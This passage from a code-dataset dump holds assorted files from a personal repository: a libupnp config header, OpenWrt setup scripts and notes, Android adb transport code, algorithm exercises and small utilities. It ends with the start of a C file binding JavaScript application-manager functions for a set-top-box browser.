*/\n#define HAVE_NETDB_H 1\n\n/* Define to 1 if you have the <netinet/in.h> header file. */\n#define HAVE_NETINET_IN_H 1\n\n/* Define if you have POSIX threads libraries and header files. */\n#define HAVE_PTHREAD 1\n\n/* Define to 1 if you have the <stdint.h> header file. */\n#define HAVE_STDINT_H 1\n\n/* Define to 1 if you have the <stdlib.h> header file. */\n#define HAVE_STDLIB_H 1\n\n/* Define to 1 if you have the <strings.h> header file. */\n#define HAVE_STRINGS_H 1\n\n/* Define to 1 if you have the <string.h> header file. */\n#define HAVE_STRING_H 1\n\n/* Defines if strndup is available on your system */\n#define HAVE_STRNDUP 1\n\n/* Defines if strnlen is available on your system */\n#define HAVE_STRNLEN 1\n\n/* Define to 1 if you have the <syslog.h> header file. */\n#define HAVE_SYSLOG_H 1\n\n/* Define to 1 if you have the <sys/ioctl.h> header file. */\n#define HAVE_SYS_IOCTL_H 1\n\n/* Define to 1 if you have the <sys/socket.h> header file. */\n#define HAVE_SYS_SOCKET_H 1\n\n/* Define to 1 if you have the <sys/stat.h> header file. */\n#define HAVE_SYS_STAT_H 1\n\n/* Define to 1 if you have the <sys/time.h> header file. */\n#define HAVE_SYS_TIME_H 1\n\n/* Define to 1 if you have the <sys/types.h> header file. */\n#define HAVE_SYS_TYPES_H 1\n\n/* Define to 1 if you have the <unistd.h> header file. */\n#define HAVE_UNISTD_H 1\n\n/* Define to 1 if you have the `vprintf' function. */\n#define HAVE_VPRINTF 1\n\n/* Define to 1 if you have the <ws2tcpip.h> header file. */\n/* #undef HAVE_WS2TCPIP_H */\n\n/* Define to the sub-directory in which libtool stores uninstalled libraries.\n */\n#define LT_OBJDIR \".libs/\"\n\n/* Define to 1 to prevent compilation of assert() */\n#define NDEBUG 1\n\n/* Define to 1 to prevent some debug code */\n#define NO_DEBUG 1\n\n/* Define to 1 if your C compiler doesn't accept -c and -o together. */\n/* #undef NO_MINUS_C_MINUS_O */\n\n/* Name of package */\n#define PACKAGE \"libupnp\"\n\n/* Define to the address where bug reports for this package should be sent. */\n#define PACKAGE_BUGREPORT \"[email protected]\"\n\n/* Define to the full name of this package. */\n#define PACKAGE_NAME \"libupnp\"\n\n/* Define to the full name and version of this package. */\n#define PACKAGE_STRING \"libupnp 1.8.0\"\n\n/* Define to the one symbol short name of this package. */\n#define PACKAGE_TARNAME \"libupnp\"\n\n/* Define to the home page for this package. */\n#define PACKAGE_URL \"\"\n\n/* Define to the version of this package. */\n#define PACKAGE_VERSION \"1.8.0\"\n\n/* Define to necessary symbol if this constant uses a non-standard name on\n your system. */\n/* #undef PTHREAD_CREATE_JOINABLE */\n\n/* Define to 1 if you have the ANSI C header files. */\n#define STDC_HEADERS 1\n\n/* see upnpconfig.h */\n#define UPNP_ENABLE_BLOCKING_TCP_CONNECTIONS 1\n\n/* see upnpconfig.h */\n/* #undef UPNP_ENABLE_IPV6 */\n\n/* see upnpconfig.h */\n#define UPNP_ENABLE_NOTIFICATION_REORDERING 1\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_CLIENT 1\n\n/* see upnpconfig.h */\n/* #undef UPNP_HAVE_DEBUG */\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_DEVICE 1\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_TOOLS 1\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_WEBSERVER 1\n\n/* Do not use pthread_rwlock_t */\n#define UPNP_USE_RWLOCK 1\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_MAJOR 1\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_MINOR 8\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_PATCH 0\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_STRING \"1.8.0\"\n\n/* Version number of package */\n#define VERSION \"1.8.0\"\n\n/* File Offset size */\n#define _FILE_OFFSET_BITS 64\n\n/* Define to 1 to make fseeko visible on some hosts (e.g. glibc 2.2). */\n/* #undef _LARGEFILE_SOURCE */\n\n/* Large files support */\n#define _LARGE_FILE_SOURCE /**/\n\n/* Define to empty if `const' does not conform to ANSI C. */\n/* #undef const */\n\n/* Define to `long int' if <sys/types.h> does not define. */\n/* #undef off_t */\n\n/* Define to `unsigned int' if <sys/types.h> does not define. */\n/* #undef size_t */\n\n/* Type for storing the length of struct sockaddr */\n/* #undef socklen_t */\n" }, { "alpha_fraction": 0.7207792401313782, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 153, "blob_id": "f9ee16fc0a85b40b935e439225845a52f64d8b4e", "content_id": "f9b1fff925ad850de713abfc9f95bc97675a3ada", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 308, "license_type": "permissive", "max_line_length": 167, "num_lines": 2, "path": "/settings/openwrt/readme_for_dir-505.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "the default wan interface for dir-505 is eth1, so when we want to use pdnsd as dns cache, do remeber to change the interface=eth0 to interface=eth1 in pdnsd.conf file.\nand the dns for dnsmasq doesn't work, so it's a better idea to forward dns query to pdnsd by adding 'server=127.0.0.1#1053' in dnsmasq.conf\n" }, { "alpha_fraction": 0.5510146617889404, "alphanum_fraction": 0.5697575807571411, "avg_line_length": 25.878787994384766, "blob_id": "4a72fb891aaee768ab088c756c5f4219c0c62c10", "content_id": "c528d1f8b850ef363ab5dbe42c3374251ca3144e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7096, "license_type": "permissive", "max_line_length": 125, "num_lines": 264, "path": "/android/adb/transport_local.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2007 The Android Open Source Project\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n\n#include \"sysdeps.h\"\n#include <sys/types.h>\n\n#define TRACE_TAG TRACE_TRANSPORT\n#include \"adb.h\"\n\n#ifdef __ppc__\n#define H4(x)\t(((x) & 0xFF000000) >> 24) | (((x) & 0x00FF0000) >> 8) | (((x) & 0x0000FF00) << 8) | (((x) & 0x000000FF) << 24)\nstatic inline void fix_endians(apacket *p)\n{\n p->msg.command = H4(p->msg.command);\n p->msg.arg0 = H4(p->msg.arg0);\n p->msg.arg1 = H4(p->msg.arg1);\n p->msg.data_length = H4(p->msg.data_length);\n p->msg.data_check = H4(p->msg.data_check);\n p->msg.magic = H4(p->msg.magic);\n}\n#else\n#define fix_endians(p) do {} while (0)\n#endif\n\n#if ADB_HOST\n/* we keep a list of opened transports, transport 0 is bound to 5555,\n * transport 1 to 5557, .. transport n to 5555 + n*2. the list is used\n * to detect when we're trying to connect twice to a given local transport\n */\n#define ADB_LOCAL_TRANSPORT_MAX 16\n\nADB_MUTEX_DEFINE( local_transports_lock );\n\nstatic atransport* local_transports[ ADB_LOCAL_TRANSPORT_MAX ];\n#endif /* ADB_HOST */\n\nstatic int remote_read(apacket *p, atransport *t)\n{\n if(readx(t->sfd, &p->msg, sizeof(amessage))){\n D(\"remote local: read terminated (message)\\n\");\n return -1;\n }\n\n fix_endians(p);\n\n#if 0 && defined __ppc__\n D(\"read remote packet: %04x arg0=%0x arg1=%0x data_length=%0x data_check=%0x magic=%0x\\n\",\n p->msg.command, p->msg.arg0, p->msg.arg1, p->msg.data_length, p->msg.data_check, p->msg.magic);\n#endif\n if(check_header(p)) {\n D(\"bad header: terminated (data)\\n\");\n return -1;\n }\n\n if(readx(t->sfd, p->data, p->msg.data_length)){\n D(\"remote local: terminated (data)\\n\");\n return -1;\n }\n\n if(check_data(p)) {\n D(\"bad data: terminated (data)\\n\");\n return -1;\n }\n\n return 0;\n}\n\nstatic int remote_write(apacket *p, atransport *t)\n{\n int length = p->msg.data_length;\n\n fix_endians(p);\n\n#if 0 && defined __ppc__\n D(\"write remote packet: %04x arg0=%0x arg1=%0x data_length=%0x data_check=%0x magic=%0x\\n\",\n p->msg.command, p->msg.arg0, p->msg.arg1, p->msg.data_length, p->msg.data_check, p->msg.magic);\n#endif\n if(writex(t->sfd, &p->msg, sizeof(amessage) + length)) {\n D(\"remote local: write terminated\\n\");\n return -1;\n }\n\n return 0;\n}\n\n\nint local_connect(int port)\n{\n char buf[64];\n int fd = -1;\n\n#if ADB_HOST\n const char *host = getenv(\"ADBHOST\");\n if (host) {\n fd = socket_network_client(host, port, SOCK_STREAM);\n }\n#endif\n if (fd < 0) {\n fd = socket_loopback_client(port, SOCK_STREAM);\n }\n\n if (fd >= 0) {\n D(\"client: connected on remote on fd %d\\n\", fd);\n close_on_exec(fd);\n disable_tcp_nagle(fd);\n snprintf(buf, sizeof buf, \"%s%d\", LOCAL_CLIENT_PREFIX, port - 1);\n register_socket_transport(fd, buf, port, 1);\n return 0;\n }\n return -1;\n}\n\n\nstatic void *client_socket_thread(void *x)\n{\n#if ADB_HOST\n int port = ADB_LOCAL_TRANSPORT_PORT;\n int count = ADB_LOCAL_TRANSPORT_MAX;\n\n D(\"transport: client_socket_thread() starting\\n\");\n\n /* try to connect to any number of running emulator instances */\n /* this is only done when ADB starts up. later, each new emulator */\n /* will send a message to ADB to indicate that is is starting up */\n for ( ; count > 0; count--, port += 2 ) {\n (void) local_connect(port);\n }\n#endif\n return 0;\n}\n\nstatic void *server_socket_thread(void * arg)\n{\n int serverfd, fd;\n struct sockaddr addr;\n socklen_t alen;\n int port = (int)arg;\n\n D(\"transport: server_socket_thread() starting\\n\");\n serverfd = -1;\n for(;;) {\n if(serverfd == -1) {\n serverfd = socket_inaddr_any_server(port, SOCK_STREAM);\n if(serverfd < 0) {\n D(\"server: cannot bind socket yet\\n\");\n adb_sleep_ms(1000);\n continue;\n }\n close_on_exec(serverfd);\n }\n\n alen = sizeof(addr);\n D(\"server: trying to get new connection from %d\\n\", port);\n fd = adb_socket_accept(serverfd, &addr, &alen);\n if(fd >= 0) {\n D(\"server: new connection on fd %d\\n\", fd);\n close_on_exec(fd);\n disable_tcp_nagle(fd);\n register_socket_transport(fd, \"host\", port, 1);\n }\n }\n D(\"transport: server_socket_thread() exiting\\n\");\n return 0;\n}\n\nvoid local_init(int port)\n{\n adb_thread_t thr;\n void* (*func)(void *);\n\n if(HOST) {\n func = client_socket_thread;\n } else {\n func = server_socket_thread;\n }\n\n D(\"transport: local %s init\\n\", HOST ? \"client\" : \"server\");\n\n if(adb_thread_create(&thr, func, (void *)port)) {\n fatal_errno(\"cannot create local socket %s thread\",\n HOST ? \"client\" : \"server\");\n }\n}\n\nstatic void remote_kick(atransport *t)\n{\n int fd = t->sfd;\n t->sfd = -1;\n adb_close(fd);\n\n#if ADB_HOST\n if(HOST) {\n int nn;\n adb_mutex_lock( &local_transports_lock );\n for (nn = 0; nn < ADB_LOCAL_TRANSPORT_MAX; nn++) {\n if (local_transports[nn] == t) {\n local_transports[nn] = NULL;\n break;\n }\n }\n adb_mutex_unlock( &local_transports_lock );\n }\n#endif\n}\n\nstatic void remote_close(atransport *t)\n{\n adb_close(t->fd);\n}\n\nint init_socket_transport(atransport *t, int s, int port, int local)\n{\n int fail = 0;\n\n t->kick = remote_kick;\n t->close = remote_close;\n t->read_from_remote = remote_read;\n t->write_to_remote = remote_write;\n t->sfd = s;\n t->sync_token = 1;\n t->connection_state = CS_OFFLINE;\n t->type = kTransportLocal;\n\n#if ADB_HOST\n if (HOST && local) {\n adb_mutex_lock( &local_transports_lock );\n {\n int index = (port - ADB_LOCAL_TRANSPORT_PORT)/2;\n\n if (!(port & 1) || index < 0 || index >= ADB_LOCAL_TRANSPORT_MAX) {\n D(\"bad local transport port number: %d\\n\", port);\n fail = -1;\n }\n else if (local_transports[index] != NULL) {\n D(\"local transport for port %d already registered (%p)?\\n\",\n port, local_transports[index]);\n fail = -1;\n }\n else\n local_transports[index] = t;\n }\n adb_mutex_unlock( &local_transports_lock );\n }\n#endif\n return fail;\n}\n" }, { "alpha_fraction": 0.7816244959831238, "alphanum_fraction": 0.7869507074356079, "avg_line_length": 33.1363639831543, "blob_id": "5e94023c317b545ef56f42f9c40dea27b1e969b9", "content_id": "651ef45a581275820d4e5f5d0c696c3160ee6df0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 751, "license_type": "permissive", "max_line_length": 123, "num_lines": 22, "path": "/settings/openwrt/setup.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# use http://mirrors.ustc.edu.cn/openwrt/ instead of http://downloads.openwrt.org in opkg cfg (/etc/opkg/) to improve speed\nopkg update\n# for usb devices \nopkg install kmod-usb-storage \n# for fstab mount and ext4 file system\nopkg install block-mount kmod-fs-ext4\n# to use ext disk for software storage\n# mount /dev/sda1 /overlay\n# for ntfs file system\nopkg install ntfs-3g samba luci-app-samba\n\nopkg install iptables-mod-nat-extra\n\nopkg install pdnsd\n# or consider using dnscrypt-proxy, edit /etc/config/dnscrypt-proxy after installation\n\nopkg install libpolarssl\n# download shadowsocks from: https://github.com/shadowsocks/openwrt-shadowsocks\n# update /etc/shadowsocks/config.json accordingly\n\n/etc/init.d/pdnsd enable\n/etc/init.d/shadowsocks enable\n" }, { "alpha_fraction": 0.5007225275039673, "alphanum_fraction": 0.5158959627151489, "avg_line_length": 28.446807861328125, "blob_id": "1fca3aefab1981000198dabc6e5173cef04d38a7", "content_id": "8ac23ce8a4d08cf9a6c08b5a4ab6569c8ae38457", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1384, "license_type": "permissive", "max_line_length": 262, "num_lines": 47, "path": "/algorithm/leetcode/3_longest_substring_without_repeating_characters.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_3\n *\n * Longest Substring Without Repeating Characters May 16 '114362 / 13161\n *\n * Given a string, find the length of the longest substring without repeating characters. For example, the longest substring without repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. For \"bbbbb\" the longest substring is \"b\", with the length of 1.\n *\n */\n\n#include <iostream>\n#include <set>\n#include <string>\n\nusing namespace std;\nclass Solution {\n public:\n int lengthOfLongestSubstring(string s) {\n set<char> appeared_chars;\n int count = 0;\n int max_count = 0;\n \n for(int i = 0; i < s.length(); ++i) {\n for(int j = i; j < s.length(); ++j) {\n if(appeared_chars.end() == appeared_chars.find(s[j])) {\n appeared_chars.insert(s[j]);\n ++count;\n }\n else\n break;\n }\n if(count > max_count)\n max_count = count;\n appeared_chars.clear();\n count = 0;\n }\n\n return max_count;\n }\n};\n\nint main(int argc, const char *argv[]) {\n Solution slu;\n string s(\"abcdcefcg\");\n cout << slu.lengthOfLongestSubstring(s) << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.5562219023704529, "alphanum_fraction": 0.5712143778800964, "avg_line_length": 22, "blob_id": "e5fbe87b3683cbb6d8cc0743305bc8d0265dc050", "content_id": "7bb187dd446d2ece08fc6829dad26f138b8c6f60", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 667, "license_type": "permissive", "max_line_length": 70, "num_lines": 29, "path": "/tools/perror/perror.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// perror is available in mysql package on osx, install with homebrew\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n\nstatic void print_usage() {\n printf(\"perror, convert error code(decimal) to description text\\n\"\n \" usage: perror errorno\\n\");\n}\n\nint main(int argc, const char *argv[])\n{\n int err = 0;\n if(argc != 2) {\n print_usage();\n return 1;\n }\n err = strtol(argv[1], NULL, 10);\n if(errno == EINVAL || errno == ERANGE) {\n fprintf(stderr, \"error code is invalid\\n\");\n return 1;\n }\n if(err < 0)\n err = -1*err;\n printf(\"%s\\n\", strerror(err));\n return 0;\n}\n" }, { "alpha_fraction": 0.7426160573959351, "alphanum_fraction": 0.7510548233985901, "avg_line_length": 22.700000762939453, "blob_id": "be1fb3e23c9539e617e2486d5fbdd4b89e78c86e", "content_id": "01a6bb4499631909fb016ec11deb77a47f5955a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 237, "license_type": "permissive", "max_line_length": 52, "num_lines": 10, "path": "/seminars/sqlserver_on_vsphere_best_practices/makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "all: ppt\n\nimg:\n\t#dot -o history.png -Tpng history.dot\n\t#dot -o architecture.png -Tpng architecture.dot\n\t#dot -o architecture_2.png -Tpng architecture_2.dot\n\nppt: img\n\txelatex -interaction=nonstopmode *.tex\n\topen sqlserver_on_vsphere.pdf\n" }, { "alpha_fraction": 0.6871921420097351, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 19.299999237060547, "blob_id": "b4fab13424f0a2e7a3e3e5789bd56e022dfc2e43", "content_id": "a288d7a02f43580378bf0b70ea85ecf9eb06759e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 406, "license_type": "permissive", "max_line_length": 83, "num_lines": 20, "path": "/settings/openwrt/readme.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "To mount additional usb devices to file system, add below contents to /etc/rc.local\n\n'''\nif [ -b /dev/sda2 ]; then\n mkdir -p /mnt/ext\n mount -t ext4 /dev/sda2 /mnt/ext\n mount -t ext4 /dev/sda2 /overlay\nfi\n'''\n\nMake sure required file systems are installed via opkg\n\n\n## Installation for normal openwrt router\n\n- run setup.sh\n\n## Installation for dir-505 openwrt router\n\n- refer to readme_for_dir-505.md\n" }, { "alpha_fraction": 0.559440553188324, "alphanum_fraction": 0.6223776340484619, "avg_line_length": 19.428571701049805, "blob_id": "0eccf290b3512db88e6bbf7551e642cbdb64669e", "content_id": "bf923ba5cecfc1a4128f136b25d9dcc21f3d797e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 143, "license_type": "permissive", "max_line_length": 45, "num_lines": 7, "path": "/settings/btsync/start_btsync.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nif [ -b /dev/sda1 ]; then\n mkdir -p /mnt/data\n mount -t ext4 /dev/sda1 /mnt/data\n btsync --nodaemon --webui.listen 0.0.0.0:80\nfi\n" }, { "alpha_fraction": 0.39830905199050903, "alphanum_fraction": 0.4194457530975342, "avg_line_length": 22.44827651977539, "blob_id": "3316d1307f9d0e0c5d979a8cb1cc8b9de36b1fdb", "content_id": "88a94e93c29876d32942956c073829067d6564e3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2129, "license_type": "permissive", "max_line_length": 88, "num_lines": 87, "path": "/algorithm/i2a_ex_9.3-8/ex9_3_8.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\r\n// \r\n// Filename: 9_3_8.cpp\r\n// \r\n// Description: solution to exercise 9.3-8 of Introduction to algorithms\r\n// \r\n// Version: 1.0\r\n// Created: 12/16/2009 7:44:56 PM\r\n// Revision: none\r\n// Compiler: cl.exe\r\n// \r\n// Author: Raymond Wen (), \r\n// Company: \r\n// \r\n// =====================================================================================\r\n\r\n#include\t<time.h>\r\n#include\t<cstdlib>\r\n#include\t<vector>\r\n#include\t<iostream>\r\n\r\ntypedef std::vector<int> int_vector;\r\n\r\nint random()\r\n{\r\n static int initialized = false;\r\n if(!initialized)\r\n {\r\n srand(static_cast<unsigned int>(time(NULL)));\r\n initialized = true;\r\n }\r\n\r\n return rand();\r\n}\t\t// ---------- end of function random ----------\r\n\r\nvoid printVec (const int_vector& vec)\r\n{\r\n for each(int i in vec)\r\n std::cout << i << \" \";\r\n std::cout << std::endl;\r\n}\t\t// ----- end of function printVec -----\r\n\r\nint getMedian(const int_vector& x, int lx, int hx, const int_vector& y, int ly, int hy)\r\n{\r\n int cx, cy, mx, my, z = 0;\r\n cx = (lx+hx)/2;\r\n cy = hy-(cx-lx);\r\n mx = x[cx];\r\n my = y[cy];\r\n if(mx <= my)\r\n {\r\n if(cy < 1 || mx >= y[cy-1])\r\n return mx;\r\n else\r\n return getMedian(x, cx+1, hx, y, ly, cy-1);\r\n }\r\n else\r\n {\r\n if(cx < 1 || my >= x[cx-1])\r\n return my;\r\n else\r\n return getMedian(x, lx, cx-1, y, cy+1, hy);\r\n }\r\n}\r\n\r\nint main ( int argc, char *argv[] )\r\n{\r\n int n = 8;\r\n const int limit = 100;\r\n if(argc > 1)\r\n n = atoi(argv[1]);\r\n int_vector x,y;\r\n int xbase = 0, ybase = 0;\r\n for(int i = 0; i < n; ++i)\r\n {\r\n xbase += random() % limit;\r\n ybase += random() % limit;\r\n x.push_back(xbase);\r\n y.push_back(ybase);\r\n }\r\n printVec(x);\r\n printVec(y);\r\n\r\n int z = getMedian(x, 0, x.size()-1, y, 0, y.size()-1);\r\n std::cout << z << std::endl;\r\n return 0;\r\n}\t // ---------- end of function main ----------\r\n\r\n" }, { "alpha_fraction": 0.704402506351471, "alphanum_fraction": 0.704402506351471, "avg_line_length": 16.66666603088379, "blob_id": "58d484eb980405696135692eadb7584f3beba2d5", "content_id": "0b6cf4e37dca5bcfeeebcb6f8b738ad1a9d7b59b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 318, "license_type": "permissive", "max_line_length": 40, "num_lines": 18, "path": "/android/exosip_sample/sip_exe/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\tsipexe.cpp\n\nLOCAL_CFLAGS +=\t-DOSIP_MT -DENABLE_TRACE\n\nLOCAL_SHARED_LIBRARIES := \\\n libosip libexosip\n\nLOCAL_LDLIBS += -llog\n\nLOCAL_MODULE:= sipexe\n\ninclude $(BUILD_EXECUTABLE)\n$(call import-module,libosip)\n$(call import-module,libexosip)\n" }, { "alpha_fraction": 0.7033247947692871, "alphanum_fraction": 0.7033247947692871, "avg_line_length": 20.66666603088379, "blob_id": "59cc9b446a8406ddb39019cafa8d0a93be645357", "content_id": "151d05b705c2da4504101106141d8a41a4fca20f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 391, "license_type": "permissive", "max_line_length": 84, "num_lines": 18, "path": "/android/logtest/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\tlogtest.cpp\n\nLOCAL_SHARED_LIBRARIES := \\\n\tlibcutils\n\n# LOCAL_C_INCLUDES := $(LOCAL_PATH)/include\n\n# LOCAL_CFLAGS := -DMACRO_DEF\n\nLOCAL_MODULE:= logtest \n\ninclude $(BUILD_EXECUTABLE) \n# $(BUILD_SHARED_LIBRARY) $(BUILD_STATIC_LIBRARY)\n# $(BUILD_HOST_EXECUTABLE) $(BUILD_HOST_SHARED_LIBRARY) $(BUILD_HOST_STATIC_LIBRARY)\n\n" } ]
75
popazerty/eve-browser
https://github.com/popazerty/eve-browser
e1e6dc1118c0d47e7f55b9ae51b285680788f5b6
3010ae530971ca87b1e82ab42e11f2a304177225
064d5a571951cdade92bb1d2eab767ec37512c40
refs/heads/master
2021-01-19T21:48:16.321324
2014-11-23T08:04:20
2014-11-23T08:04:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 24.33333396911621, "blob_id": "ef7c8e039abb423c3b5bfc690945d656b306249b", "content_id": "9f022ab84d84166adb07c06015d16a96a772cd2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 76, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/README.md", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "eve-browser\n===========\nEve Browser is a browser designed for set top boxes\n" }, { "alpha_fraction": 0.6781273484230042, "alphanum_fraction": 0.6806309223175049, "avg_line_length": 30.04145050048828, "blob_id": "3546eac30c74412f725f2ff23897df403d0128ac", "content_id": "1ac6778d0045d7fbd2bbd295bbc07b492354e099", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 11983, "license_type": "no_license", "max_line_length": 131, "num_lines": 386, "path": "/js_extension.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "/** \nThis file contains the js <-> c bindings \n**/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <string.h>\n\n#ifdef GTK\n#include <webkit/webkit.h>\n#endif\n#ifdef DFB\n#include <webkit/webkitdfb.h>\n#include <glib.h>\n#include <webkit/webview.h>\n#endif\n\n#include <JavaScriptCore/JavaScript.h>\n\n#include \"js_debug.h\"\n\nstatic int (*g_Callback)(int type) = NULL;\n\n/******************************************/\n\n#ifdef DFB\nvoid webkit_web_view_execute_script(LiteWebView* web_view, char* script)\n{\n lite_webview_execute_script(web_view, script);\n}\n#endif\n\n// Registering single funxtions\n#ifdef GTK\nvoid register_javascript_function(WebKitWebView* web_view, const char *name, JSObjectCallAsFunctionCallback callback)\n#endif\n#ifdef DFB\nvoid register_javascript_function(LiteWebView* web_view, const char *name, JSObjectCallAsFunctionCallback callback)\n#endif\n{\n#ifdef GTK\n WebKitWebFrame *frame = webkit_web_view_get_main_frame(WEBKIT_WEB_VIEW(web_view));\n JSContextRef ctx = webkit_web_frame_get_global_context(frame);\n#endif\n#ifdef DFB\n JSContextRef ctx = lite_webview_get_global_context(web_view);\n#endif\n JSObjectRef global = JSContextGetGlobalObject(ctx);\n JSObjectRef func = JSObjectMakeFunctionWithCallback(ctx, NULL, callback);\n JSStringRef jsname = JSStringCreateWithUTF8CString(name);\n JSObjectSetProperty(ctx, global, jsname, func,0, NULL);\n JSStringRelease(jsname);\n}\n\n\n/******************************************/\n\nchar s_o_ApplicationManager[] = \n\"function ApplicationManager() {\\\n}\";\n\n\nchar s_o_getOwnerApplication[] = \n\"HTMLObjectElement.prototype.getOwnerApplication = function(document) {\\\n c_o_getOwnerApplication(document); \\\n return new ApplicationManager(); \\\n}\";\n\nJSValueRef\nc_o_getOwnerApplication (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\n\nchar s_o_ApplicationManager_createApplication[] = \n\"ApplicationManager.prototype.createApplication = function(url, unknown) {\\\n window.location.href = url; \\\n c_o_ApplicationManager_createApplication(url, unknown); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_createApplication (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_ApplicationManager_destroyApplication[] = \n\"ApplicationManager.prototype.destroyApplication = function() {\\\n c_o_ApplicationManager_destroyApplication(); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_destroyApplication (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_ApplicationManager_show[] = \n\"ApplicationManager.prototype.show = function() {\\\n c_o_ApplicationManager_show(); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_show (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_ApplicationManager_hide[] = \n\"ApplicationManager.prototype.hide = function() {\\\n c_o_ApplicationManager_hide(); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_hide (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\n// HTMLObjectElement - Bindings\n// Visibility setting is a workaround to get video object invisible \nchar 